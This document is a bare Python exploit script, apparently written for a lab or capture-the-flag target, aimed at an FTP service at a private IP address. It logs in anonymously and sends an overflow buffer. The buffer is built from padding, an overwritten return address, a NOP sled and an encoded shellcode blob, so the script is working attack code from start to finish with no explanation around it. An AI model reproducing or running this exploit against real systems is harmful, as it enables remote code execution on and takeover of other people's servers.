import socket, os, sys



buf =  b""
buf += b"\xb8\x39\xeb\xe7\x16\xdb\xcc\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\x7b\xe5\x05"
buf += b"\xe3\x87\x11\x4b\x0c\x77\xe2\x2c\x84\x92\xd3\x6c\xf2"
buf += b"\xd7\x44\x5d\x70\xb5\x68\x16\xd4\x2d\xfa\x5a\xf1\x42"
buf += b"\x4b\xd0\x27\x6d\x4c\x49\x1b\xec\xce\x90\x48\xce\xef"
buf += b"\x5a\x9d\x0f\x37\x86\x6c\x5d\xe0\xcc\xc3\x71\x85\x99"
buf += b"\xdf\xfa\xd5\x0c\x58\x1f\xad\x2f\x49\x8e\xa5\x69\x49"
buf += b"\x31\x69\x02\xc0\x29\x6e\x2f\x9a\xc2\x44\xdb\x1d\x02"
buf += b"\x95\x24\xb1\x6b\x19\xd7\xcb\xac\x9e\x08\xbe\xc4\xdc"
buf += b"\xb5\xb9\x13\x9e\x61\x4f\x87\x38\xe1\xf7\x63\xb8\x26"
buf += b"\x61\xe0\xb6\x83\xe5\xae\xda\x12\x29\xc5\xe7\x9f\xcc"
buf += b"\x09\x6e\xdb\xea\x8d\x2a\xbf\x93\x94\x96\x6e\xab\xc6"
buf += b"\x78\xce\x09\x8d\x95\x1b\x20\xcc\xf1\xe8\x09\xee\x01"
buf += b"\x67\x19\x9d\x33\x28\xb1\x09\x78\xa1\x1f\xce\x7f\x98"
buf += b"\xd8\x40\x7e\x23\x19\x49\x45\x77\x49\xe1\x6c\xf8\x02"
buf += b"\xf1\x91\x2d\x84\xa1\x3d\x9e\x65\x11\xfe\x4e\x0e\x7b"
buf += b"\xf1\xb1\x2e\x84\xdb\xd9\xc5\x7f\x8c\xef\x11\x2b\x64"
buf += b"\x98\x23\xd3\x70\x8a\xad\x35\x12\x3a\xf8\xee\x8b\xa3"
buf += b"\xa1\x64\x2d\x2b\x7c\x01\x6d\xa7\x73\xf6\x20\x40\xf9"
buf += b"\xe4\xd5\xa0\xb4\x56\x73\xbe\x62\xfe\x1f\x2d\xe9\xfe"
buf += b"\x56\x4e\xa6\xa9\x3f\xa0\xbf\x3f\xd2\x9b\x69\x5d\x2f"
buf += b"\x7d\x51\xe5\xf4\xbe\x5c\xe4\x79\xfa\x7a\xf6\x47\x03"
buf += b"\xc7\xa2\x17\x52\x91\x1c\xde\x0c\x53\xf6\x88\xe3\x3d"
buf += b"\x9e\x4d\xc8\xfd\xd8\x51\x05\x88\x04\xe3\xf0\xcd\x3b"
buf += b"\xcc\x94\xd9\x44\x30\x05\x25\x9f\xf0\x35\x6c\xbd\x51"
buf += b"\xde\x29\x54\xe0\x83\xc9\x83\x27\xba\x49\x21\xd8\x39"
buf += b"\x51\x40\xdd\x06\xd5\xb9\xaf\x17\xb0\xbd\x1c\x17\x91"


buffer = "A" * 251 + "\x5b\x4e\xd3\x77" + "\x90" * 16 + buf + "C" * (1000-(275+len(buf)))

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('10.10.182.255', 21))

s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)

s.send(buffer + '\r\n')

s.send('QUIT\r\n')

s.close()
